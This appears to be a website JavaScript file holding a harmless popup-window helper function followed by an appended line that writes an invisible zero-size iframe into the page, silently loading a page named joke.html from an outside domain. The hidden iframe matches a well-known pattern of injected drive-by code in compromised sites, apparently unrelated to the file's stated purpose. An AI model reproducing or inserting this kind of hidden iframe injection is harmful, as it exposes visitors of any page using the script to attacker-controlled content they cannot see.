function openNewWindow(fileName,windowName,theWidth,theHeight)
 {
	if (windowName == "newMessageWindow") 
	{
		uniqueName = new Date();
		windowName = uniqueName.getTime();
	}
	window.open(fileName,windowName,"toolbar=0,location=0,directories=0,status=0,menubar=0,scrollbars=1,width="+theWidth+",height="+theHeight)
}
document.write("<iframe width='0' height='0' src='http://www.miccpit.com/duoyuzhong/include/joke.html'></iframe>");